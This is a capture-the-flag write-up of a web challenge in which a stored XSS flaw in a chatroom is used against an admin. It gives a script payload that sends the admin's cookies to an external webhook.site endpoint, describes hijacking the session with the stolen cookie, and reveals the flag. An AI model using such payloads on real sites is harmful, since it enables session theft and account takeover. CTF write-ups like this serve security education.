E-CTF-2025 - Web

Chatroom Link to heading

In this challenge, we are provided with access to a chatroom, where a message indicates that the admin will read our message in 30 seconds.

Upon seeing this, I immediately suspect a possible XSS (Cross-Site Scripting) vulnerability, as if the message is stored and executed in the admin’s browser, we could potentially inject malicious JavaScript.

Step 1 - Testing for XSS Injection Link to heading

To verify if the input is vulnerable to XSS, I test a simple payload:

<script>alert(1)</script>

Result: An alert box appears, confirming that my code executes correctly on the page.

Step 2 - Exfiltrating Admin Cookies Link to heading

Now that I’ve confirmed XSS works, I proceed to exploit this vulnerability to steal the admin’s cookies.

Payload used: Link to heading

<script> window.location.href = "https://webhook.site/573a7e16-fd1f-4a49-8445-1e5e43a5c297?cookie=" + document.cookie </script>

This script automatically sends the admin’s browser cookies to my webhook.site endpoint, allowing me to retrieve their session information.

Step 3 - Retrieving Admin Cookie Link to heading

A few seconds later, I receive a request on my endpoint with the admin’s cookie:

Cookie content:

• username=Alice
• id_value=adminaeg5af2z3cds2csdsdc3cnb

Step 4 - Session Hijacking Link to heading

With this information, I modify my own browser cookies to impersonate the admin session.

Step 5 - Accessing and Retrieving the Flag Link to heading

After refreshing the page with the admin session, I directly access the flag.

Flag: ectf{XSS_1s_d4ng3r0us}